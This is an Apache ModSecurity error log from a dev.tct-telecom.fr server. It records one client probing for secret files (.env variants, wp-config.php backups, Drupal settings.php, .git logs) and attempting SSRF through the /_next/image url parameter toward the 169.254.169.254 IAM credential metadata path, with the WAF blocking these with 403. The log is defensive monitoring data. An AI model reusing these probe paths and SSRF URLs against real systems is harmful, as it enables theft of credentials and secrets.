[Mon May 11 15:23:24.020692 2026] [security2:error] [pid 1319998:tid 1320016] [client 195.178.110.133:47400] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYTKt2WtvoFr7xvGzVZQAAAJA"]
[Mon May 11 15:23:24.020827 2026] [security2:error] [pid 1319998:tid 1320016] [client 195.178.110.133:47400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYTKt2WtvoFr7xvGzVZQAAAJA"]
[Mon May 11 15:23:24.021235 2026] [security2:error] [pid 1319885:tid 1319907] [client 195.178.110.133:47518] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYTFchVQ3tCn0m9OpZqgAAAQw"]
[Mon May 11 15:23:24.021402 2026] [security2:error] [pid 1319885:tid 1319907] [client 195.178.110.133:47518] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYTFchVQ3tCn0m9OpZqgAAAQw"]
[Mon May 11 15:23:24.024129 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:47516] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYTOJEyNRN152ArOSNdQAAAFU"]
[Mon May 11 15:23:24.024263 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:47516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/wp-config.php~"] [unique_id "agHYTOJEyNRN152ArOSNdQAAAFU"]
[Mon May 11 15:23:24.025633 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:47398] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYTOSQ-m-m0ukSShuCfgAAAUk"]
[Mon May 11 15:23:24.025799 2026] [security2:error] [pid 1319953:tid 1319964] [client 195.178.110.133:47398] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.git/logs/HEAD"] [unique_id "agHYTOSQ-m-m0ukSShuCfgAAAUk"]
[Mon May 11 15:23:24.027389 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYS1chVQ3tCn0m9OpZpwAAAQM"]
[Mon May 11 15:23:24.028442 2026] [proxy_fcgi:error] [pid 1319886:tid 1319914] [client 195.178.110.133:47252] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.033290 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:47500] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYTKO9RdIr1DwxYR2TUgAAANE"]
[Mon May 11 15:23:24.033453 2026] [security2:error] [pid 1320674:tid 1320706] [client 195.178.110.133:47500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYTKO9RdIr1DwxYR2TUgAAANE"]
[Mon May 11 15:23:24.037078 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.038108 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.133:2880] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYReSQ-m-m0ukSShuCPgAAAVg"]
[Mon May 11 15:23:24.043927 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:3458] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRKO9RdIr1DwxYR2S6AAAAMY"]
[Mon May 11 15:23:24.063058 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.063375 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.083606 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.091603 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.111339 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.115947 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.132829 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.153982 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.154529 2026] [security2:error] [pid 1319886:tid 1319911] [client 195.178.110.133:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRKy-5-wpj6Sx56aY1wAAAAg"]
[Mon May 11 15:23:24.155785 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.156224 2026] [security2:error] [pid 1319886:tid 1319928] [client 195.178.110.133:3784] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYRqy-5-wpj6Sx56aZDgAAABI"]
[Mon May 11 15:23:24.183534 2026] [proxy_fcgi:error] [pid 1319885:tid 1319891] [client 195.178.110.133:47230] AH01071: Got error 'Primary script unknown'
[Mon May 11 15:23:24.189588 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.224673 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.252558 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.718623 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:24.949451 2026] [:error] [pid 1319998:tid 1320003] [client 52.169.148.186:15039] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:23:25.533481 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:47584] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYTeSQ-m-m0ukSShuCfwAAAUU"]
[Mon May 11 15:23:25.536458 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:47584] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYTeSQ-m-m0ukSShuCfwAAAUU"]
[Mon May 11 15:23:25.652748 2026] [security2:error] [pid 1319953:tid 1319957] [client 195.178.110.133:3446] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYROSQ-m-m0ukSShuCIwAAAUI"]
[Mon May 11 15:23:25.672263 2026] [security2:error] [pid 1320398:tid 1320404] [client 195.178.110.133:3474] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYROJEyNRN152ArOSM-QAAAEQ"]
[Mon May 11 15:23:26.178552 2026] [security2:error] [pid 1319885:tid 1319889] [client 195.178.110.133:47734] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYTlchVQ3tCn0m9OpZtAAAAQE"]
[Mon May 11 15:23:26.185603 2026] [security2:error] [pid 1319885:tid 1319889] [client 195.178.110.133:47734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image"] [unique_id "agHYTlchVQ3tCn0m9OpZtAAAAQE"]
[Mon May 11 15:23:28.678743 2026] [security2:error] [pid 1320398:tid 1320417] [client 195.178.110.133:47824] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYUOJEyNRN152ArOSNeQAAAFE"]
[Mon May 11 15:23:28.678937 2026] [security2:error] [pid 1320398:tid 1320417] [client 195.178.110.133:47824] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYUOJEyNRN152ArOSNeQAAAFE"]
[Mon May 11 15:23:28.682255 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:47838] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYUKy-5-wpj6Sx56aZZwAAABA"]
[Mon May 11 15:23:28.682949 2026] [security2:error] [pid 1319886:tid 1319924] [client 195.178.110.133:47838] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYUKy-5-wpj6Sx56aZZwAAABA"]
[Mon May 11 15:23:29.910208 2026] [security2:error] [pid 1319885:tid 1319930] [client 195.178.110.133:46730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSFchVQ3tCn0m9OpZgQAAARU"]
[Mon May 11 15:23:30.753437 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSFchVQ3tCn0m9OpZgwAAAQ0"]
[Mon May 11 15:23:30.821503 2026] [security2:error] [pid 1319886:tid 1319929] [client 195.178.110.133:46618] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSKy-5-wpj6Sx56aZIwAAABM"]
[Mon May 11 15:23:31.386300 2026] [security2:error] [pid 1320674:tid 1320708] [client 195.178.110.133:46710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSKO9RdIr1DwxYR2THgAAANM"]
[Mon May 11 15:23:32.068448 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:63588] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYVFchVQ3tCn0m9OpZugAAARA"]
[Mon May 11 15:23:32.068643 2026] [security2:error] [pid 1319885:tid 1319918] [client 195.178.110.133:63588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYVFchVQ3tCn0m9OpZugAAARA"]
[Mon May 11 15:23:32.693338 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:63628] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYVKO9RdIr1DwxYR2TXgAAAMg"]
[Mon May 11 15:23:32.694015 2026] [security2:error] [pid 1320674:tid 1320698] [client 195.178.110.133:63628] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.dev.tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agHYVKO9RdIr1DwxYR2TXgAAAMg"]
[Mon May 11 15:23:33.091671 2026] [security2:error] [pid 1319953:tid 1319963] [client 195.178.110.133:46694] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSOSQ-m-m0ukSShuCXQAAAUg"]
[Mon May 11 15:23:33.247747 2026] [security2:error] [pid 1319886:tid 1319917] [client 195.178.110.133:46664] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.dev.tct-telecom.fr"] [uri "/index.php"] [unique_id "agHYSKy-5-wpj6Sx56aZJQAAAAw"]
